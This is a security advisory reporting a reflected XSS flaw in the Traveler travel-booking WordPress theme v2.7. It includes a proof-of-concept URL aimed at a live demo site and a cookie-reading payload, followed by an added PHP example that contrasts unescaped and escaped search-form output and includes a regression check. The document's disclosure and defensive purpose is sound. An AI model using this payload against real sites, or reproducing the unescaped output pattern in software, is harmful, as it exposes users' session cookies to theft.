[*] :: Title: Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-28
[*] :: Software: Traveler - Travel Booking WordPress Theme v2.7
[?] :: Technical Details & Description:
# Weak security measures, such as no filtering of input field data, have been discovered in the Traveler - Travel Booking WordPress Theme. The current version of this premium WordPress theme is 2.7.
[?] :: Demo Website:
# https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Frontend: https://remap.travelerwp.com/
[!] :: Special Note:
# 5.822 Sales
[!] :: For developers:
# Disabling any data changes on demo websites doesn't make your applications more secure. It's good for business and sales, but you are simply double-crossing your clients.
[+] :: PoC [Links]:
# https://remap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E
[+] :: PoC [Reflected XSS Injection]:
# For Reflected XSS Injection, use the default WordPress search on the demo website: https://remap.travelerwp.com/?s=[payload]
# Sample payload: "><img src=x onerror=alert(document.cookie)>
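The missing output filtering described above and its fix, as an added example that is not code from the advisory or from the Traveler theme. It assumes the search term is reflected into an HTML attribute value; the function names are hypothetical, and plain PHP `htmlspecialchars()` stands in for the WordPress escaping helpers so the file runs without WordPress.

```php
<?php
// Added example: a hypothetical search form, not the Traveler theme's own code.
// Assumption: the theme echoes the "s" query parameter into an attribute value.

// Weak form: the raw parameter is concatenated into the value attribute, so a
// double quote in the input ends the attribute and the rest is parsed as markup.
function render_search_weak(string $s): string
{
    return '<input type="search" name="s" value="' . $s . '">';
}

// Hardened form: encode for the HTML attribute context at output time.
// Inside a WordPress template, esc_attr() or get_search_query() fills this role.
function render_search_hardened(string $s): string
{
    $safe = htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="search" name="s" value="' . $safe . '">';
}

// Regression check: true when the rendered form contains any tag other than
// the single <input> the template itself emits.
function has_injected_markup(string $html): bool
{
    return preg_match_all('/<[a-z!\/]/i', $html) > 1;
}

// Sample payload quoted in the advisory, plus a benign query as a control.
$inputs = [
    'benign'  => 'hotels in rome',
    'payload' => '"><img src=x onerror=alert(document.cookie)>',
];

foreach ($inputs as $label => $s) {
    printf(
        "%-8s weak=%s hardened=%s\n",
        $label,
        has_injected_markup(render_search_weak($s)) ? 'INJECTED' : 'clean',
        has_injected_markup(render_search_hardened($s)) ? 'INJECTED' : 'clean'
    );
}
```

The same check can run as a regression test against every template that prints the search term, since the encoding has to match each output context (attribute, element body, URL).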